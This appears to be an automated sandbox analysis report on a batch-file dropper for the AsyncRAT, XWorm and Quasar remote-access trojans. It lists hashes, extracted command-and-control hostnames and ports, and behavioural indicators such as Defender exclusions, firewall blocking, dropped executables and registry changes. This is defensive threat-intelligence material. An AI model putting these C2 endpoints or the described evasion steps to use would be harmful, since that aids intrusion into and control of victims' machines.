asyncrat | 3d25b09ab5a16a6b49a7394175b3bce37ba2ae9ce8771408b05280b1bd14b036

Analysis

max time kernel
1049s
max time network
1048s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
29-06-2024 20:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Output.bat
Size

1.1MB
MD5

1897b3980473ad054ab05b0f2ced4de7
SHA1

a694b444dc8dd30e07f69671c3905ffb6fe13532
SHA256

3d25b09ab5a16a6b49a7394175b3bce37ba2ae9ce8771408b05280b1bd14b036
SHA512

6f67fe1aca76aa0ff33ebf7f1edc4bae6b25c34c543ffa8f59220e520dea91fe92bd50681a5d3086353ef245bd28887bca93efa276ad2544dfbdbdd188ba5ee1
SSDEEP

24576:H9/ZDtETtFPa65VkOdET4sDgnVI4jGzwMVACzrDc:HqRcRBkwAGM

Score

10^/10

asyncrat quasar xworm default evasion execution persistence privilege_escalation rat spyware trojan

Malware Config

Extracted

Family

xworm

best-bird.gl.at.ply.gg:27196

super-nearest.gl.at.ply.gg:17835

Extracted

Family

asyncrat

Botnet

Default

finally-grande.gl.at.ply.gg:25844

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 4 IoCs

Processes:

resource	yara_rule
C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe	family_xworm
behavioral1/memory/4996-219-0x0000000000DE0000-0x0000000000DF8000-memory.dmp	family_xworm
C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe	family_xworm
behavioral1/memory/2360-237-0x00000000007A0000-0x00000000007BA000-memory.dmp	family_xworm

Modifies firewall policy service 3 TTPs 3 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{1A280F62-479D-4C75-BCF5-F49586D9CB43} = "v2.30\|Action=Block\|Active=TRUE\|Dir=In\|Name=Microsoft Edge\|Desc=Microsoft Edge Browser\|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000\|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984\|EmbedCtxt=Microsoft Edge\|"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules\{46180BB6-C69C-4461-B788-35D602E3D2C8} = "v2.30\|Action=Block\|Active=TRUE\|Dir=Out\|Name=Microsoft Edge\|Desc=Microsoft Edge Browser\|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000\|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984\|EmbedCtxt=Microsoft Edge\|"	svchost.exe

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30\|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984\|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000\|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984\|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe\|Name=Microsoft Edge\|Desc=Microsoft Edge Browser\|"	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\PolicyVersion = "542"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Parameters\AppCs\AppCs\S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984S-1-5-21-1337824034-2731376981-3755436523-1000 = "v2.30\|AppPkgId=S-1-15-2-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984\|LUOwn=S-1-5-21-1337824034-2731376981-3755436523-1000\|C=S-1-15-3-543634040-274359014-2226501544-3561766748-3991453649-3543631192-522786984\|M=microsoft.microsoftedge.stable_8wekyb3d8bbwe\|Name=Microsoft Edge\|Desc=Microsoft Edge Browser\|D=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\\|PFN=Microsoft.MicrosoftEdge.Stable_92.0.902.67_neutral__8wekyb3d8bbwe\|"	svchost.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar payload 1 IoCs

Processes:

resource yara_rule

C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe family_quasar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Async RAT payload 1 IoCs
rat

Processes:

resource yara_rule

C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe family_asyncrat
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

856 powershell.exe
3740 powershell.exe
2688 powershell.exe
4664 powershell.exe
620 powershell.exe
2652 powershell.exe
2736 powershell.exe

resource	yara_rule
C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe	family_quasar

resource	yara_rule
C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe	family_asyncrat

pid	process
856	powershell.exe
3740	powershell.exe
2688	powershell.exe
4664	powershell.exe
620	powershell.exe
2652	powershell.exe
2736	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exemshta.exesvchost.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	svchost.exe

Executes dropped EXE 4 IoCs

Processes:

hat.exemshta.exeONPE.exesvchost.exe

pid process

744 hat.exe
4996 mshta.exe
4332 ONPE.exe
2360 svchost.exe

pid	process
744	hat.exe
4996	mshta.exe
4332	ONPE.exe
2360	svchost.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	process
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

5 ip-api.com

flow	ioc
5	ip-api.com

Drops file in System32 directory 43 IoCs

Processes:

svchost.exesvchost.exesvchost.exesvchost.exepowershell.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx	svchost.exe
File created	C:\Windows\system32\wdi\LogFiles\StartupInfo\S-1-5-21-1337824034-2731376981-3755436523-1000_StartupInfo3.xml	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\SRU\SRU.log	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\SRU\SRUDB.jfm	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File created	C:\Windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{518e6335-aaed-4471-8c1b-13da3e76dbf8}\snapshot.etl	svchost.exe
File created	C:\Windows\System32\WindowsPowerShell\v1.0\hat.exe	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe
File opened for modification	C:\Windows\system32\SRU\SRUDB.dat	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx	svchost.exe
File opened for modification	C:\Windows\system32\WDI\BootPerformanceDiagnostics_SystemData.bin	svchost.exe
File created	C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe	powershell.exe
File created	C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe	powershell.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-Scripted%4Admin.evtx	svchost.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF	svchost.exe
File opened for modification	C:\Windows\system32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{518e6335-aaed-4471-8c1b-13da3e76dbf8}\snapshot.etl	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\system32\SRU\SRU.chk	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx	svchost.exe
File opened for modification	C:\Windows\system32\WDI\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\S-1-5-21-1337824034-2731376981-3755436523-1000_UserData.bin	svchost.exe
File created	C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File created	C:\Windows\system32\NDF\{E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC}-temp-06292024-2013.etl	svchost.exe
File opened for modification	C:\Windows\system32\NDF\{E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC}-temp-06292024-2013.etl	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnosis-Scripted%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Diagnostics-Networking%4Operational.evtx	svchost.exe

Drops file in Windows directory 3 IoCs

Processes:

Explorer.EXEsvchost.exe

description	ioc	process
File created	C:\Windows\INF\netsstpa.PNF	Explorer.EXE
File created	C:\Windows\INF\netrasa.PNF	Explorer.EXE
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exe

description	ioc	process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exesvchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Software\Microsoft\Internet Explorer\IESettingSync	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE

Modifies data under HKEY_USERS 14 IoCs

Processes:

svchost.exesvchost.exesvchost.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = 82079ef260cada01	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E3FB4E05F"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\RAS AutoDial	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\RAS AutoDial\Default	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = cc2ee48762cada01	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecision = "0"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionTime = caabb54d61cada01	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-73-28-53-3d-61\WpadDecisionReason = "1"	svchost.exe

Modifies registry class 53 IoCs

Processes:

svchost.exeExplorer.EXEpowershell.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133641655111398851"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PTT = "133641655992145014"	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PCT = "133641655787268193"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\ICT = "133641655754612850"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ITT = "133641655800705768"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PCT = "133641655955094805"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!m = f401000040010000	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133641655285734553"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ICT = "133641655790549625"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PTT = "133641655800862074"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133641655989134936"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ICT = "133641655957085279"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI	svchost.exe
